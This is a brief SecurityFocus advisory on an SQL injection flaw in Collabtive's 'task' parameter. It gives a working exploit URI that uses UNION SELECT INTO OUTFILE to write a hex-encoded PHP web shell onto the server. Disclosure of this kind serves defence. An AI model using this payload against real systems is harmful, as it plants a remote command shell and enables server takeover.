Collabtive 'task' Parameter SQL Injection Vulnerability

An attacker can exploit this issue using a web browser.

The following example URI and exploit are available:

http://www.example.com/collabtive/manageuser.php?action=profile&id=1&task=1%20UNION%20SELECT%200x3c3f7068702073797374656d28245f4745545b227272225d293b3f3e%20INTO%20OUTFILE%20%27hcked%27;&project=1


 

Privacy Statement
Copyright 2010, SecurityFocus